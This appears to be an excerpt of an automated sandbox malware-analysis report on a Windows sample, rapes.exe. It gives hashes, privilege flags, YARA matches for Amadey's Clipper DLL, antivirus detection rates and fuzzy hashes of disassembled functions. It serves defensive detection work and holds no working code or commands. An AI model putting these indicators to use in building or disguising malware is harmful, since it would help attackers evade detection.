              Path:C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
              Imagebase:0xbf0000
              File size:1'903'104 bytes
              MD5 hash:0B7487B0B78BD7587E0583B13B068F02
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000002.00000002.1297857996.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000002.00000003.1257661877.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 61%, ReversingLabs
              Reputation:low
              Has exited:true
              Show Windows behavior

              File Activities

              Show Windows behavior

              Section Activities

              Show Windows behavior

              Registry Activities

              Show Windows behavior

              Mutex Activities

              Show Windows behavior

              Process Activities

              Show Windows behavior

              Thread Activities

              Show Windows behavior

              Memory Activities

              Show Windows behavior

              System Activities

              Show Windows behavior

              Windows UI Activities


              General

              Target ID:10
              Start time:09:27:01
              Start date:29/03/2025
              Path:C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
              Imagebase:0xbf0000
              File size:1'903'104 bytes
              MD5 hash:0B7487B0B78BD7587E0583B13B068F02
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 0000000A.00000003.1763027264.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false
              Show Windows behavior

              File Activities

              Show Windows behavior

              Section Activities

              Show Windows behavior

              Registry Activities

              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              Show Windows behavior

              Mutex Activities

              Show Windows behavior

              Process Activities

              Show Windows behavior

              Thread Activities

              Show Windows behavior

              Memory Activities

              Show Windows behavior

              System Activities

              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              Show Windows behavior

              Windows UI Activities

              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

              Disassembly

              Executed Functions

              Memory Dump Source
              • Source File: 00000000.00000002.1271829048.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4a70000_random.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b28f37447b8a9fffa437a4c1cdd6d41db54dacee98d9ec05af3d36614b8168e
              • Instruction ID: e8c307e115587eab2489e07b2dff5fbaf8dac0625699260f35378ceba833d7aa
              • Opcode Fuzzy Hash: 3b28f37447b8a9fffa437a4c1cdd6d41db54dacee98d9ec05af3d36614b8168e
              • Instruction Fuzzy Hash: B2F02097B0E2601DD6375AB14C54AE23FB18F23425FEF68A3C083D9A43B0487607A281
              Memory Dump Source
              • Source File: 00000000.00000002.1271829048.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4a70000_random.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1901198576a8471e2c5bb03ffd68f38b8564a3e3e62adda8b17fdd18d949c586
              • Instruction ID: 2ff8671dc45006e909a73be12f0ba18c60984cc08070fac2217eeeff2cec5ded
              • Opcode Fuzzy Hash: 1901198576a8471e2c5bb03ffd68f38b8564a3e3e62adda8b17fdd18d949c586
              • Instruction Fuzzy Hash: 0BF0C0A370C2506DD733C6600D51BE17FF15F03515FDE44B6D14299D83B58972199381
              Memory Dump Source
              • Source File: 00000000.00000002.1271829048.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4a70000_random.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 531fd0d2cf31a1eca7c4978109bc53d6893b7d8d455f07884f8283a6dedcd698
              • Instruction ID: 9bc9c54e701202b67a2aa56d5aa06427d280985c738700592d8b9f2f18cb0fb9
              • Opcode Fuzzy Hash: 531fd0d2cf31a1eca7c4978109bc53d6893b7d8d455f07884f8283a6dedcd698
              • Instruction Fuzzy Hash: 1CE061BB70C215AF822295E15B555B07FF29C13136FFF48B9D083D6A43B5891115F215

              Non-executed Functions

              Memory Dump Source
              • Source File: 00000000.00000002.1271829048.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_4a70000_random.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15969d144d9aaea5b3b02594850ccaadd06a62f666c7fa0dbc90fc62333c84f2
              • Instruction ID: eecfd007df09b7c5920b4a4408878cec761302c0fb0131b972a7fb973718f8a3
              • Opcode Fuzzy Hash: 15969d144d9aaea5b3b02594850ccaadd06a62f666c7fa0dbc90fc62333c84f2
              • Instruction Fuzzy Hash: 32E012EB15D5243D306291592F64DFB1B2DD4C1B70331C957F506E2542E5886D8A2572